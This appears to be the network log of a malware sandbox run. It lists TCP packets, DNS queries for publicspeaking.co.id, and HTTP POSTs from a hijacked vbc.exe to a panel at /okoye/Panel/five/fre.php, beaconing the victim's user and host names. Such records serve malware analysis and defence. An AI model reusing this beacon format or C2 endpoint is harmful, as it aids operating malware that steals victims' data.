                                  Dec 22, 2024 14:13:37.061248064 CET4993480192.168.2.592.113.16.67
                                  Dec 22, 2024 14:13:37.064186096 CET4993480192.168.2.592.113.16.67
                                  Dec 22, 2024 14:13:37.184015989 CET804993492.113.16.67192.168.2.5
                                  Dec 22, 2024 14:13:37.184149981 CET4993480192.168.2.592.113.16.67
                                  Dec 22, 2024 14:13:37.303713083 CET804993492.113.16.67192.168.2.5
                                  Dec 22, 2024 14:13:38.783813953 CET804993492.113.16.67192.168.2.5
                                  Dec 22, 2024 14:13:38.783854008 CET804993492.113.16.67192.168.2.5
                                  Dec 22, 2024 14:13:38.783947945 CET4993480192.168.2.592.113.16.67
                                  Dec 22, 2024 14:13:38.784089088 CET4993480192.168.2.592.113.16.67
                                  Dec 22, 2024 14:13:38.784540892 CET804993492.113.16.67192.168.2.5
                                  Dec 22, 2024 14:13:38.784604073 CET4993480192.168.2.592.113.16.67
                                  Dec 22, 2024 14:13:38.903822899 CET804993492.113.16.67192.168.2.5
                                  Dec 22, 2024 14:13:38.947916985 CET4994080192.168.2.592.113.16.67
                                  Dec 22, 2024 14:13:39.068056107 CET804994092.113.16.67192.168.2.5
                                  Dec 22, 2024 14:13:39.068255901 CET4994080192.168.2.592.113.16.67
                                  Dec 22, 2024 14:13:39.071338892 CET4994080192.168.2.592.113.16.67
                                  Dec 22, 2024 14:13:39.190954924 CET804994092.113.16.67192.168.2.5
                                  Dec 22, 2024 14:13:39.191137075 CET4994080192.168.2.592.113.16.67
                                  Dec 22, 2024 14:13:39.310647964 CET804994092.113.16.67192.168.2.5
                                  Dec 22, 2024 14:13:40.663906097 CET804994092.113.16.67192.168.2.5
                                  Dec 22, 2024 14:13:40.663966894 CET804994092.113.16.67192.168.2.5
                                  Dec 22, 2024 14:13:40.664036036 CET4994080192.168.2.592.113.16.67
                                  Dec 22, 2024 14:13:40.664365053 CET804994092.113.16.67192.168.2.5
                                  Dec 22, 2024 14:13:40.664429903 CET4994080192.168.2.592.113.16.67
                                  Dec 22, 2024 14:13:40.667639971 CET4994080192.168.2.592.113.16.67
                                  Dec 22, 2024 14:13:40.787293911 CET804994092.113.16.67192.168.2.5
                                  Dec 22, 2024 14:13:40.973592997 CET4994480192.168.2.592.113.16.67
                                  Dec 22, 2024 14:13:41.093319893 CET804994492.113.16.67192.168.2.5
                                  Dec 22, 2024 14:13:41.093396902 CET4994480192.168.2.592.113.16.67
                                  Dec 22, 2024 14:13:41.096642971 CET4994480192.168.2.592.113.16.67
                                  Dec 22, 2024 14:13:41.217156887 CET804994492.113.16.67192.168.2.5
                                  Dec 22, 2024 14:13:41.217228889 CET4994480192.168.2.592.113.16.67
                                  Dec 22, 2024 14:13:41.336735964 CET804994492.113.16.67192.168.2.5
                                  Dec 22, 2024 14:13:42.776597023 CET804994492.113.16.67192.168.2.5
                                  Dec 22, 2024 14:13:42.776618004 CET804994492.113.16.67192.168.2.5
                                  Dec 22, 2024 14:13:42.776626110 CET804994492.113.16.67192.168.2.5
                                  Dec 22, 2024 14:13:42.776806116 CET4994480192.168.2.592.113.16.67
                                  Dec 22, 2024 14:13:42.776824951 CET4994480192.168.2.592.113.16.67
                                  Dec 22, 2024 14:13:42.896260023 CET804994492.113.16.67192.168.2.5
                                  Dec 22, 2024 14:13:42.932081938 CET4995080192.168.2.592.113.16.67
                                  Dec 22, 2024 14:13:43.051645041 CET804995092.113.16.67192.168.2.5
                                  Dec 22, 2024 14:13:43.051738977 CET4995080192.168.2.592.113.16.67
                                  Dec 22, 2024 14:13:43.053759098 CET4995080192.168.2.592.113.16.67
                                  Dec 22, 2024 14:13:43.173592091 CET804995092.113.16.67192.168.2.5
                                  Dec 22, 2024 14:13:43.173669100 CET4995080192.168.2.592.113.16.67
                                  Dec 22, 2024 14:13:43.293184042 CET804995092.113.16.67192.168.2.5
                                  Dec 22, 2024 14:13:44.747859001 CET804995092.113.16.67192.168.2.5
                                  Dec 22, 2024 14:13:44.747922897 CET804995092.113.16.67192.168.2.5
                                  Dec 22, 2024 14:13:44.748035908 CET4995080192.168.2.592.113.16.67
                                  Dec 22, 2024 14:13:44.748040915 CET804995092.113.16.67192.168.2.5
                                  Dec 22, 2024 14:13:44.748090029 CET4995080192.168.2.592.113.16.67
                                  Dec 22, 2024 14:13:44.748112917 CET4995080192.168.2.592.113.16.67
                                  Dec 22, 2024 14:13:44.867754936 CET804995092.113.16.67192.168.2.5
                                  Dec 22, 2024 14:13:44.892371893 CET4995580192.168.2.592.113.16.67
                                  Dec 22, 2024 14:13:45.012159109 CET804995592.113.16.67192.168.2.5
                                  Dec 22, 2024 14:13:45.012382030 CET4995580192.168.2.592.113.16.67
                                  Dec 22, 2024 14:13:45.014931917 CET4995580192.168.2.592.113.16.67
                                  Dec 22, 2024 14:13:45.134496927 CET804995592.113.16.67192.168.2.5
                                  Dec 22, 2024 14:13:45.134598970 CET4995580192.168.2.592.113.16.67
                                  Dec 22, 2024 14:13:45.254055977 CET804995592.113.16.67192.168.2.5
                                  Dec 22, 2024 14:13:46.742389917 CET804995592.113.16.67192.168.2.5
                                  Dec 22, 2024 14:13:46.742428064 CET804995592.113.16.67192.168.2.5
                                  Dec 22, 2024 14:13:46.742499113 CET4995580192.168.2.592.113.16.67
                                  Dec 22, 2024 14:13:46.742538929 CET4995580192.168.2.592.113.16.67
                                  Dec 22, 2024 14:13:46.742944956 CET804995592.113.16.67192.168.2.5
                                  Dec 22, 2024 14:13:46.743032932 CET4995580192.168.2.592.113.16.67
                                  Dec 22, 2024 14:13:46.862124920 CET804995592.113.16.67192.168.2.5
                                  Dec 22, 2024 14:13:46.890084028 CET4995980192.168.2.592.113.16.67
                                  Dec 22, 2024 14:13:47.009841919 CET804995992.113.16.67192.168.2.5
                                  Dec 22, 2024 14:13:47.010088921 CET4995980192.168.2.592.113.16.67
                                  Dec 22, 2024 14:13:47.012166977 CET4995980192.168.2.592.113.16.67
                                  Dec 22, 2024 14:13:47.131791115 CET804995992.113.16.67192.168.2.5
                                  Dec 22, 2024 14:13:47.131865025 CET4995980192.168.2.592.113.16.67
                                  Dec 22, 2024 14:13:47.331811905 CET804995992.113.16.67192.168.2.5
                                  Dec 22, 2024 14:13:48.702753067 CET804995992.113.16.67192.168.2.5
                                  Dec 22, 2024 14:13:48.702883959 CET804995992.113.16.67192.168.2.5
                                  Dec 22, 2024 14:13:48.702934027 CET804995992.113.16.67192.168.2.5
                                  Dec 22, 2024 14:13:48.702997923 CET4995980192.168.2.592.113.16.67
                                  Dec 22, 2024 14:13:48.702999115 CET4995980192.168.2.592.113.16.67
                                  Dec 22, 2024 14:13:48.703290939 CET4995980192.168.2.592.113.16.67
                                  Dec 22, 2024 14:13:48.823026896 CET804995992.113.16.67192.168.2.5
                                  Dec 22, 2024 14:13:48.840440035 CET4996480192.168.2.592.113.16.67
                                  Dec 22, 2024 14:13:48.960078955 CET804996492.113.16.67192.168.2.5
                                  Dec 22, 2024 14:13:48.960172892 CET4996480192.168.2.592.113.16.67
                                  Dec 22, 2024 14:13:48.962547064 CET4996480192.168.2.592.113.16.67
                                  Dec 22, 2024 14:13:49.082221031 CET804996492.113.16.67192.168.2.5
                                  Dec 22, 2024 14:13:49.082293034 CET4996480192.168.2.592.113.16.67
                                  Dec 22, 2024 14:13:49.202255964 CET804996492.113.16.67192.168.2.5
                                  Dec 22, 2024 14:13:50.576571941 CET804996492.113.16.67192.168.2.5
                                  Dec 22, 2024 14:13:50.576713085 CET804996492.113.16.67192.168.2.5
                                  Dec 22, 2024 14:13:50.576775074 CET4996480192.168.2.592.113.16.67
                                  Dec 22, 2024 14:13:50.576808929 CET4996480192.168.2.592.113.16.67
                                  Dec 22, 2024 14:13:50.577022076 CET804996492.113.16.67192.168.2.5
                                  Dec 22, 2024 14:13:50.577114105 CET4996480192.168.2.592.113.16.67
                                  Dec 22, 2024 14:13:50.696402073 CET804996492.113.16.67192.168.2.5
                                  Dec 22, 2024 14:13:50.730278969 CET4997080192.168.2.592.113.16.67
                                  Dec 22, 2024 14:13:50.849963903 CET804997092.113.16.67192.168.2.5
                                  Dec 22, 2024 14:13:50.853373051 CET4997080192.168.2.592.113.16.67
                                  Dec 22, 2024 14:13:50.855422974 CET4997080192.168.2.592.113.16.67
                                  Dec 22, 2024 14:13:50.975032091 CET804997092.113.16.67192.168.2.5
                                  Dec 22, 2024 14:13:50.975179911 CET4997080192.168.2.592.113.16.67
                                  Dec 22, 2024 14:13:51.094887018 CET804997092.113.16.67192.168.2.5
                                  Dec 22, 2024 14:13:52.558160067 CET804997092.113.16.67192.168.2.5
                                  Dec 22, 2024 14:13:52.558290005 CET804997092.113.16.67192.168.2.5
                                  Dec 22, 2024 14:13:52.558386087 CET4997080192.168.2.592.113.16.67
                                  Dec 22, 2024 14:13:52.558413982 CET4997080192.168.2.592.113.16.67
                                  Dec 22, 2024 14:13:52.559226036 CET804997092.113.16.67192.168.2.5
                                  Dec 22, 2024 14:13:52.559274912 CET4997080192.168.2.592.113.16.67
                                  Dec 22, 2024 14:13:52.678061008 CET804997092.113.16.67192.168.2.5
                                  Dec 22, 2024 14:13:52.700841904 CET4997680192.168.2.592.113.16.67
                                  Dec 22, 2024 14:13:52.820672989 CET804997692.113.16.67192.168.2.5
                                  Dec 22, 2024 14:13:52.820780039 CET4997680192.168.2.592.113.16.67
                                  Dec 22, 2024 14:13:52.822540045 CET4997680192.168.2.592.113.16.67
                                  Dec 22, 2024 14:13:52.942343950 CET804997692.113.16.67192.168.2.5
                                  Dec 22, 2024 14:13:52.942630053 CET4997680192.168.2.592.113.16.67
                                  Dec 22, 2024 14:13:53.062288046 CET804997692.113.16.67192.168.2.5
                                  Dec 22, 2024 14:13:54.531948090 CET804997692.113.16.67192.168.2.5
                                  Dec 22, 2024 14:13:54.532008886 CET804997692.113.16.67192.168.2.5
                                  Dec 22, 2024 14:13:54.532041073 CET804997692.113.16.67192.168.2.5
                                  Dec 22, 2024 14:13:54.532203913 CET4997680192.168.2.592.113.16.67
                                  Dec 22, 2024 14:13:54.532203913 CET4997680192.168.2.592.113.16.67
                                  Dec 22, 2024 14:13:54.551629066 CET4997680192.168.2.592.113.16.67
                                  Dec 22, 2024 14:13:54.671257973 CET804997692.113.16.67192.168.2.5
                                  Dec 22, 2024 14:13:54.959203959 CET4998280192.168.2.592.113.16.67
                                  Dec 22, 2024 14:13:55.079032898 CET804998292.113.16.67192.168.2.5
                                  Dec 22, 2024 14:13:55.079138041 CET4998280192.168.2.592.113.16.67
                                  Dec 22, 2024 14:13:55.087287903 CET4998280192.168.2.592.113.16.67
                                  Dec 22, 2024 14:13:55.208082914 CET804998292.113.16.67192.168.2.5
                                  Dec 22, 2024 14:13:55.208168983 CET4998280192.168.2.592.113.16.67
                                  Dec 22, 2024 14:13:55.327892065 CET804998292.113.16.67192.168.2.5
                                  Dec 22, 2024 14:13:56.719813108 CET804998292.113.16.67192.168.2.5
                                  Dec 22, 2024 14:13:56.719855070 CET804998292.113.16.67192.168.2.5
                                  Dec 22, 2024 14:13:56.719887018 CET804998292.113.16.67192.168.2.5
                                  Dec 22, 2024 14:13:56.719927073 CET4998280192.168.2.592.113.16.67
                                  Dec 22, 2024 14:13:56.719980955 CET4998280192.168.2.592.113.16.67
                                  Dec 22, 2024 14:13:56.719981909 CET4998280192.168.2.592.113.16.67
                                  Dec 22, 2024 14:13:56.840045929 CET804998292.113.16.67192.168.2.5
                                  Dec 22, 2024 14:13:56.873394012 CET4998880192.168.2.592.113.16.67
                                  Dec 22, 2024 14:13:56.993004084 CET804998892.113.16.67192.168.2.5
                                  Dec 22, 2024 14:13:56.993123055 CET4998880192.168.2.592.113.16.67
                                  Dec 22, 2024 14:13:56.995337963 CET4998880192.168.2.592.113.16.67
                                  Dec 22, 2024 14:13:57.114999056 CET804998892.113.16.67192.168.2.5
                                  Dec 22, 2024 14:13:57.115154028 CET4998880192.168.2.592.113.16.67
                                  Dec 22, 2024 14:13:57.234822989 CET804998892.113.16.67192.168.2.5
                                  Dec 22, 2024 14:13:58.700980902 CET804998892.113.16.67192.168.2.5
                                  Dec 22, 2024 14:13:58.701054096 CET804998892.113.16.67192.168.2.5
                                  Dec 22, 2024 14:13:58.701138020 CET4998880192.168.2.592.113.16.67
                                  Dec 22, 2024 14:13:58.701200008 CET4998880192.168.2.592.113.16.67
                                  Dec 22, 2024 14:13:58.702227116 CET804998892.113.16.67192.168.2.5
                                  Dec 22, 2024 14:13:58.702286005 CET4998880192.168.2.592.113.16.67
                                  Dec 22, 2024 14:13:58.820775032 CET804998892.113.16.67192.168.2.5
                                  Dec 22, 2024 14:13:58.837078094 CET4999380192.168.2.592.113.16.67
                                  Dec 22, 2024 14:13:58.956799984 CET804999392.113.16.67192.168.2.5
                                  Dec 22, 2024 14:13:58.956880093 CET4999380192.168.2.592.113.16.67
                                  Dec 22, 2024 14:13:58.958937883 CET4999380192.168.2.592.113.16.67
                                  Dec 22, 2024 14:13:59.078495026 CET804999392.113.16.67192.168.2.5
                                  Dec 22, 2024 14:13:59.078912973 CET4999380192.168.2.592.113.16.67
                                  Dec 22, 2024 14:13:59.198971033 CET804999392.113.16.67192.168.2.5
                                  Dec 22, 2024 14:14:00.640110016 CET804999392.113.16.67192.168.2.5
                                  Dec 22, 2024 14:14:00.640153885 CET804999392.113.16.67192.168.2.5
                                  Dec 22, 2024 14:14:00.640244961 CET4999380192.168.2.592.113.16.67
                                  Dec 22, 2024 14:14:00.640280962 CET804999392.113.16.67192.168.2.5
                                  Dec 22, 2024 14:14:00.640280962 CET4999380192.168.2.592.113.16.67
                                  Dec 22, 2024 14:14:00.640326023 CET4999380192.168.2.592.113.16.67
                                  Dec 22, 2024 14:14:00.759912968 CET804999392.113.16.67192.168.2.5
                                  Dec 22, 2024 14:14:00.793005943 CET4999880192.168.2.592.113.16.67
                                  Dec 22, 2024 14:14:00.912539959 CET804999892.113.16.67192.168.2.5
                                  Dec 22, 2024 14:14:00.912611961 CET4999880192.168.2.592.113.16.67
                                  Dec 22, 2024 14:14:00.915138960 CET4999880192.168.2.592.113.16.67
                                  Dec 22, 2024 14:14:01.034689903 CET804999892.113.16.67192.168.2.5
                                  Dec 22, 2024 14:14:01.034852028 CET4999880192.168.2.592.113.16.67
                                  Dec 22, 2024 14:14:01.154416084 CET804999892.113.16.67192.168.2.5
                                  Dec 22, 2024 14:14:02.599672079 CET804999892.113.16.67192.168.2.5
                                  Dec 22, 2024 14:14:02.599735975 CET804999892.113.16.67192.168.2.5
                                  Dec 22, 2024 14:14:02.599809885 CET4999880192.168.2.592.113.16.67
                                  Dec 22, 2024 14:14:02.599860907 CET4999880192.168.2.592.113.16.67
                                  Dec 22, 2024 14:14:02.600188017 CET804999892.113.16.67192.168.2.5
                                  Dec 22, 2024 14:14:02.600250006 CET4999880192.168.2.592.113.16.67
                                  Dec 22, 2024 14:14:02.719698906 CET804999892.113.16.67192.168.2.5
                                  Dec 22, 2024 14:14:02.742749929 CET5000280192.168.2.592.113.16.67
                                  Dec 22, 2024 14:14:02.862373114 CET805000292.113.16.67192.168.2.5
                                  Dec 22, 2024 14:14:02.862451077 CET5000280192.168.2.592.113.16.67
                                  Dec 22, 2024 14:14:02.864523888 CET5000280192.168.2.592.113.16.67
                                  Dec 22, 2024 14:14:02.984178066 CET805000292.113.16.67192.168.2.5
                                  Dec 22, 2024 14:14:02.984416008 CET5000280192.168.2.592.113.16.67
                                  Dec 22, 2024 14:14:03.104181051 CET805000292.113.16.67192.168.2.5
                                  Dec 22, 2024 14:14:04.589252949 CET805000292.113.16.67192.168.2.5
                                  Dec 22, 2024 14:14:04.589303970 CET805000292.113.16.67192.168.2.5
                                  Dec 22, 2024 14:14:04.589436054 CET5000280192.168.2.592.113.16.67
                                  Dec 22, 2024 14:14:04.589485884 CET5000280192.168.2.592.113.16.67
                                  Dec 22, 2024 14:14:04.589927912 CET805000292.113.16.67192.168.2.5
                                  Dec 22, 2024 14:14:04.590028048 CET5000280192.168.2.592.113.16.67
                                  Dec 22, 2024 14:14:04.709182024 CET805000292.113.16.67192.168.2.5
                                  Dec 22, 2024 14:14:04.741411924 CET5000880192.168.2.592.113.16.67
                                  Dec 22, 2024 14:14:04.861069918 CET805000892.113.16.67192.168.2.5
                                  Dec 22, 2024 14:14:04.861196995 CET5000880192.168.2.592.113.16.67
                                  Dec 22, 2024 14:14:04.863217115 CET5000880192.168.2.592.113.16.67
                                  Dec 22, 2024 14:14:04.982880116 CET805000892.113.16.67192.168.2.5
                                  Dec 22, 2024 14:14:04.984505892 CET5000880192.168.2.592.113.16.67
                                  Dec 22, 2024 14:14:05.104135036 CET805000892.113.16.67192.168.2.5
                                  Dec 22, 2024 14:14:06.546581030 CET805000892.113.16.67192.168.2.5
                                  Dec 22, 2024 14:14:06.546654940 CET805000892.113.16.67192.168.2.5
                                  Dec 22, 2024 14:14:06.546731949 CET5000880192.168.2.592.113.16.67
                                  Dec 22, 2024 14:14:06.546804905 CET5000880192.168.2.592.113.16.67
                                  Dec 22, 2024 14:14:06.546984911 CET805000892.113.16.67192.168.2.5
                                  Dec 22, 2024 14:14:06.547049999 CET5000880192.168.2.592.113.16.67
                                  Dec 22, 2024 14:14:06.666299105 CET805000892.113.16.67192.168.2.5
                                  Dec 22, 2024 14:14:06.976454973 CET5001480192.168.2.592.113.16.67
                                  Dec 22, 2024 14:14:07.096165895 CET805001492.113.16.67192.168.2.5
                                  Dec 22, 2024 14:14:07.097101927 CET5001480192.168.2.592.113.16.67
                                  Dec 22, 2024 14:14:07.100033045 CET5001480192.168.2.592.113.16.67
                                  Dec 22, 2024 14:14:07.219552040 CET805001492.113.16.67192.168.2.5
                                  Dec 22, 2024 14:14:07.223056078 CET5001480192.168.2.592.113.16.67
                                  Dec 22, 2024 14:14:07.342561007 CET805001492.113.16.67192.168.2.5
                                  Dec 22, 2024 14:14:08.782496929 CET805001492.113.16.67192.168.2.5
                                  Dec 22, 2024 14:14:08.782629967 CET805001492.113.16.67192.168.2.5
                                  Dec 22, 2024 14:14:08.782718897 CET5001480192.168.2.592.113.16.67
                                  Dec 22, 2024 14:14:08.782918930 CET805001492.113.16.67192.168.2.5
                                  Dec 22, 2024 14:14:08.783865929 CET5001480192.168.2.592.113.16.67
                                  Dec 22, 2024 14:14:08.783883095 CET5001480192.168.2.592.113.16.67
                                  Dec 22, 2024 14:14:08.903594017 CET805001492.113.16.67192.168.2.5
                                  Dec 22, 2024 14:14:09.144604921 CET5002080192.168.2.592.113.16.67
                                  Dec 22, 2024 14:14:09.264132023 CET805002092.113.16.67192.168.2.5
                                  Dec 22, 2024 14:14:09.264223099 CET5002080192.168.2.592.113.16.67
                                  Dec 22, 2024 14:14:09.269464016 CET5002080192.168.2.592.113.16.67
                                  Dec 22, 2024 14:14:09.389010906 CET805002092.113.16.67192.168.2.5
                                  Dec 22, 2024 14:14:09.389082909 CET5002080192.168.2.592.113.16.67
                                  Dec 22, 2024 14:14:09.508604050 CET805002092.113.16.67192.168.2.5
                                  Dec 22, 2024 14:14:10.859057903 CET805002092.113.16.67192.168.2.5
                                  Dec 22, 2024 14:14:10.859142065 CET805002092.113.16.67192.168.2.5
                                  Dec 22, 2024 14:14:10.859158039 CET805002092.113.16.67192.168.2.5
                                  Dec 22, 2024 14:14:10.859230995 CET5002080192.168.2.592.113.16.67
                                  Dec 22, 2024 14:14:10.859298944 CET5002080192.168.2.592.113.16.67
                                  Dec 22, 2024 14:14:10.978770018 CET805002092.113.16.67192.168.2.5
                                  Dec 22, 2024 14:14:11.013789892 CET5002680192.168.2.592.113.16.67
                                  Dec 22, 2024 14:14:11.134326935 CET805002692.113.16.67192.168.2.5
                                  Dec 22, 2024 14:14:11.134541035 CET5002680192.168.2.592.113.16.67
                                  Dec 22, 2024 14:14:11.137404919 CET5002680192.168.2.592.113.16.67
                                  Dec 22, 2024 14:14:11.258621931 CET805002692.113.16.67192.168.2.5
                                  Dec 22, 2024 14:14:11.258701086 CET5002680192.168.2.592.113.16.67
                                  Dec 22, 2024 14:14:11.378510952 CET805002692.113.16.67192.168.2.5
                                  Dec 22, 2024 14:14:12.816879034 CET805002692.113.16.67192.168.2.5
                                  Dec 22, 2024 14:14:12.816898108 CET805002692.113.16.67192.168.2.5
                                  Dec 22, 2024 14:14:12.817009926 CET5002680192.168.2.592.113.16.67
                                  Dec 22, 2024 14:14:12.817121983 CET805002692.113.16.67192.168.2.5
                                  Dec 22, 2024 14:14:12.817207098 CET5002680192.168.2.592.113.16.67
                                  TimestampSource PortDest PortSource IPDest IP
                                  Dec 22, 2024 14:12:06.198252916 CET6551953192.168.2.51.1.1.1
                                  Dec 22, 2024 14:12:07.201272011 CET6551953192.168.2.51.1.1.1
                                  Dec 22, 2024 14:12:08.196599007 CET6551953192.168.2.51.1.1.1
                                  Dec 22, 2024 14:12:08.430161953 CET53655191.1.1.1192.168.2.5
                                  Dec 22, 2024 14:12:08.430195093 CET53655191.1.1.1192.168.2.5
                                  Dec 22, 2024 14:12:08.431379080 CET53655191.1.1.1192.168.2.5
                                  Dec 22, 2024 14:13:07.380589962 CET5682953192.168.2.51.1.1.1
                                  Dec 22, 2024 14:13:07.610336065 CET53568291.1.1.1192.168.2.5
                                  Dec 22, 2024 14:14:06.681036949 CET6104553192.168.2.51.1.1.1
                                  Dec 22, 2024 14:14:06.975285053 CET53610451.1.1.1192.168.2.5
                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                  Dec 22, 2024 14:12:06.198252916 CET192.168.2.51.1.1.10xda96Standard query (0)publicspeaking.co.idA (IP address)IN (0x0001)false
                                  Dec 22, 2024 14:12:07.201272011 CET192.168.2.51.1.1.10xda96Standard query (0)publicspeaking.co.idA (IP address)IN (0x0001)false
                                  Dec 22, 2024 14:12:08.196599007 CET192.168.2.51.1.1.10xda96Standard query (0)publicspeaking.co.idA (IP address)IN (0x0001)false
                                  Dec 22, 2024 14:13:07.380589962 CET192.168.2.51.1.1.10xa5bbStandard query (0)publicspeaking.co.idA (IP address)IN (0x0001)false
                                  Dec 22, 2024 14:14:06.681036949 CET192.168.2.51.1.1.10x5777Standard query (0)publicspeaking.co.idA (IP address)IN (0x0001)false
                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                  Dec 22, 2024 14:12:08.430161953 CET1.1.1.1192.168.2.50xda96No error (0)publicspeaking.co.id92.113.16.63A (IP address)IN (0x0001)false
                                  Dec 22, 2024 14:12:08.430195093 CET1.1.1.1192.168.2.50xda96No error (0)publicspeaking.co.id92.113.16.63A (IP address)IN (0x0001)false
                                  Dec 22, 2024 14:12:08.431379080 CET1.1.1.1192.168.2.50xda96No error (0)publicspeaking.co.id92.113.16.63A (IP address)IN (0x0001)false
                                  Dec 22, 2024 14:13:07.610336065 CET1.1.1.1192.168.2.50xa5bbNo error (0)publicspeaking.co.id92.113.16.67A (IP address)IN (0x0001)false
                                  Dec 22, 2024 14:14:06.975285053 CET1.1.1.1192.168.2.50x5777No error (0)publicspeaking.co.id92.113.16.67A (IP address)IN (0x0001)false
                                  • publicspeaking.co.id
                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  0192.168.2.54970492.113.16.63803292C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
                                  TimestampBytes transferredDirectionData
                                  Dec 22, 2024 14:12:08.559772968 CET257OUTPOST /okoye/Panel/five/fre.php HTTP/1.0
                                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                                  Host: publicspeaking.co.id
                                  Accept: */*
                                  Content-Type: application/octet-stream
                                  Content-Encoding: binary
                                  Content-Key: C84394D2
                                  Content-Length: 180
                                  Connection: close
                                  Dec 22, 2024 14:12:08.679462910 CET180OUTData Raw: 12 00 27 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 35 00 34 00 33 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                  Data Ascii: 'ckav.rualfons965543ALFONS-PCk0FDD42EE188E931437F4FBE2CSSjqU
                                  Dec 22, 2024 14:12:10.261677980 CET1236INHTTP/1.1 301 Moved Permanently
                                  Date: Sun, 22 Dec 2024 13:12:10 GMT
                                  Content-Type: text/html
                                  Content-Length: 795
                                  Connection: close
                                  location: https://publicspeaking.co.id/okoye/Panel/five/fre.php
                                  platform: hostinger
                                  panel: hpanel
                                  content-security-policy: upgrade-insecure-requests
                                  Server: hcdn
                                  alt-svc: h3=":443"; ma=86400
                                  x-hcdn-request-id: 2af58886faff64313e5981bab8c554dd-fra-edge1
                                  x-hcdn-cache-status: DYNAMIC
                                  x-hcdn-upstream-rt: 0.358
                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c [TRUNCATED]
                                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></b
                                  Dec 22, 2024 14:12:10.261718035 CET12INData Raw: 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                  Data Ascii: ody></html>


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  1192.168.2.54970592.113.16.63803292C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
                                  TimestampBytes transferredDirectionData
                                  Dec 22, 2024 14:12:10.511244059 CET257OUTPOST /okoye/Panel/five/fre.php HTTP/1.0
                                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                                  Host: publicspeaking.co.id
                                  Accept: */*
                                  Content-Type: application/octet-stream
                                  Content-Encoding: binary
                                  Content-Key: C84394D2
                                  Content-Length: 180
                                  Connection: close
                                  Dec 22, 2024 14:12:10.630928040 CET180OUTData Raw: 12 00 27 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 35 00 34 00 33 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                  Data Ascii: 'ckav.rualfons965543ALFONS-PC+0FDD42EE188E931437F4FBE2CzEgRl
                                  Dec 22, 2024 14:12:12.114064932 CET1236INHTTP/1.1 301 Moved Permanently
                                  Date: Sun, 22 Dec 2024 13:12:11 GMT
                                  Content-Type: text/html
                                  Content-Length: 795
                                  Connection: close
                                  location: https://publicspeaking.co.id/okoye/Panel/five/fre.php
                                  platform: hostinger
                                  panel: hpanel
                                  content-security-policy: upgrade-insecure-requests
                                  Server: hcdn
                                  alt-svc: h3=":443"; ma=86400
                                  x-hcdn-request-id: f395651a80614b623ca792fdc2eac0ed-fra-edge1
                                  x-hcdn-cache-status: DYNAMIC
                                  x-hcdn-upstream-rt: 0.339
